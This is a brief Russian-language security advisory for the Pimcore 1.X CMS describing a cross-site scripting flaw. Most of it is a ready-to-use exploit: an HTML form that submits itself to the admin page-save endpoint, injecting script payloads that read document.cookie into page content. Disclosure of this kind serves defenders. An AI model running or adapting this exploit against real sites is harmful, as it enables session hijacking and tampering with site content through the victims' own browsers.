Программа: Pimcore 1.X
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form action="http://host/admin/page/save/task/publish" method="post"
name="main" >
<input type="hidden" name="data" value='{"headernote": {"data": "Powerful CMS"><script>alert(document.cookie)</script>",
"type": "textarea"}, "headline": {"data": "The truth about pimcore", "type": "input"},
"contentblock": {"data": ["1"], "type": "block"}, "blocktypecontentblock1": {"data":
null, "type": "select"}, "sublinecontentblock1": {"data": "Content management
ala pimcore", "type": "input"}, "contentcontentblock1": {"data": "<p>\n\tPimcore</p>\n\"><script>alert(document.cookie)</script>",
"type": "wysiwyg"}}' />
<input type="hidden" name="id" value="1440" />
</form>
<script>
document.main.submit();
</script>
